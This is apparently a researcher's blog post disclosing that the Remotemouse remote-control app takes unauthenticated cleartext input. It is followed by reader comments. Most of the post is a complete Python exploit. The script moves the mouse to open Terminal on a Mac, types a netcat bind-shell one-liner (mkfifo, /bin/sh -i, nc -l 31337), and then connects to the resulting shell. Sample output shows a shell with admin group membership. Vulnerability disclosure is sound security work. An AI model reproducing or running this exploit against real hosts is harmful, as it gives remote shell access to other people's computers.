Remotemouse considered harmful

The problem

This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.

Unfortunately, when testing I found out that there was no pairing request nor any authentication… I just fired up wireshark to see what was happening and as expected, it’s a very dump cleartext protocol that indicates mouse gestures, clicks, and keyboard events.

I took my editor and went with this little script that connects to my mac, put the mouse on the upper right corner (over the search lense), click it and search for the terminal. Opens it and launches a bindshell.

Remotemouse is binding on all interfaces, ipv4 and ipv6, so if you’re using it and allow direct connections from the outside, you are vulnerable.

The code

#!/usr/bin/python
# Remote exploit against remotemouse (www.remotemouse.net)
#
# Launches a remote shell on macosx leopard
#
# Aris Adamantiadis 
#
# aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py 
# enjoy your shell !!
# Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
# sh: no job control in this shell
# aris@aris-laptop:~$ id
# id
# uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),
# 401(com.apple.access_screensharing),204(_developer),100(_lpoperator),
# 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),
# 61(localaccounts),12(everyone),501(access_bpf)
# aris@aris-laptop:~$ exit

import time
import socket
import os
right = "mos  6m 9 0"
up = "mos  6m 0 -9"
diag = "mos  6m 9 -9"
fineup = "mos  6m 0 -1"
fineright = "mos  6m 1 0"
key = "key1  "
click = "mos  5R l d" + "mos  5R l u"
host = "192.168.1.3"
shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"

def keys(v):
    f=""
    for i in v:
        f+= key + i
    return f

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,1978))
s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(1)
s.connect((host,1978))
s.send(click)
time.sleep(1)
s.send(keys("terminal"))
time.sleep(.5)
s.send("key3  RTN")
time.sleep(.5)
s.send(keys(shellcode))
time.sleep(.5)
s.send("key3  RTN")
time.sleep(.5)
s.close()
print "enjoy your shell !!"
os.system("nc -v " + host + " 31337")

The Conversation {4 comments}

  1. Jim {Monday February 6, 2012 @ 1:36 am}

    Many thanks for this post. Maybe this is a late comment but have you tried other apps? Any recommendations?

  2. Aris Adamantiadis {Monday February 6, 2012 @ 9:26 am}

    Hi,

    I did not try any alternative, so I can’t recommand any other one. Remotemouse may be just good if you disable it when you don’t use it.

  3. Jim {Monday February 6, 2012 @ 10:49 pm}

    Thanks Aris. Keep on the good work.

  4. rustic chic wedding invitations {Friday July 8, 2016 @ 12:09 pm}

    He named them as honorary Plus his word was law during the 3rd reich, so yeah

Speak Your Peace

  • Comment Policy:Could go here if there's a nagging need Login Instructions: Would go here if there's a desire.